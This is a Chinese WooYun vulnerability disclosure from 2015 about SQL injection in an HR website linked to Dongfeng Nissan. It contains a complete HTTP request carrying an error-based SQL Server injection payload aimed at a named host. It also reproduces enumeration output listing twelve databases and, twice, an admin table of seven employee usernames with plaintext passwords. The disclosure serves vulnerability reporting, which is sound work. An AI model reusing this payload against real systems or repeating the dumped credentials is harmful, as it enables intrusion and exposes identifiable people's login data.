当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136700

漏洞标题:东风汽车官网存在SQL注入(涉及HR等12个库)

相关厂商:东风日产乘用车公司

漏洞作者: 路人甲

提交时间:2015-08-24 23:36

修复时间:2015-08-25 09:04

公开时间:2015-08-25 09:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-24: 细节已通知厂商并且等待厂商处理中
2015-08-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

注入点:

POST /identify.asp HTTP/1.1
Content-Length: 233
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONIDQQSQSQBQ=LKKJMMABOEGBJFBFICHNEHAL
Host: hr.dfmc.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Sub-mit=%c8%b7%20%b6%a8&password=g00dPa%24%24w0rD&username='%2b(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR
(117)%2bCHAR(70)%2bCHAR(55)%2bCHAR(50)%2bCHAR(120)%2bCHAR(86)%2bCHAR(49)%2bCHAR(100)%2bCHAR(82))%20FROM%20syscolumns)%2b


服务器的info:

[INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000


数据库12个:
available databases [12]:
[*] dfhr2006
[*] DFHR_XTGL
[*] DFHREP
[*] dfhrmsnew
[*] dfl_ntgl
[*] dflcsalary
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
其中的一个库:

Database: dfhrmsnew
Table: dbo.Admin_Job
[7 entries]
+------------+-----------+-----------+-----------+-----------+-----------+
| Admin_Iden | Admin_UsN | Admin_Pwd | Admin_Num | Admin_TrN | Admin_Typ |
+------------+-----------+-----------+-----------+-----------+-----------+
| 0          | hudm      | 199711    | LT        | ???       | ?????     |
| 0          | lijn      | 8225935   | LT        | ???       | ?????     |
| 0          | dengjl    | 98221265  | LT        | ????????  | ?????     |
| 0          | caojm     | cjmcls    | LT        | ???       | ?????     |
| 0          | yuwq      | jhl@ywq   | LT        | ???       | ?????     |
| 0          | lihw      | lihw      | LT        | ???       | ?????     |
| 0          | ssm       | ssm0415   | IT        | ???       | ?????     |
+------------+-----------+-----------+-----------+-----------+-----------+

漏洞证明:

数据库12个:
available databases [12]:
[*] dfhr2006
[*] DFHR_XTGL
[*] DFHREP
[*] dfhrmsnew
[*] dfl_ntgl
[*] dflcsalary
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb


Database: dfhrmsnew
Table: dbo.Admin_Job
[7 entries]
+------------+-----------+-----------+-----------+-----------+-----------+
| Admin_Iden | Admin_UsN | Admin_Pwd | Admin_Num | Admin_TrN | Admin_Typ |
+------------+-----------+-----------+-----------+-----------+-----------+
| 0          | hudm      | 199711    | LT        | ???       | ?????     |
| 0          | lijn      | 8225935   | LT        | ???       | ?????     |
| 0          | dengjl    | 98221265  | LT        | ????????  | ?????     |
| 0          | caojm     | cjmcls    | LT        | ???       | ?????     |
| 0          | yuwq      | jhl@ywq   | LT        | ???       | ?????     |
| 0          | lihw      | lihw      | LT        | ???       | ?????     |
| 0          | ssm       | ssm0415   | IT        | ???       | ?????     |
+------------+-----------+-----------+-----------+-----------+-----------+

修复方案:

过滤特殊字符

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-25 09:04

厂商回复:

感谢提醒,但是网站不属我司管辖范围。谢谢!

最新状态:

暂无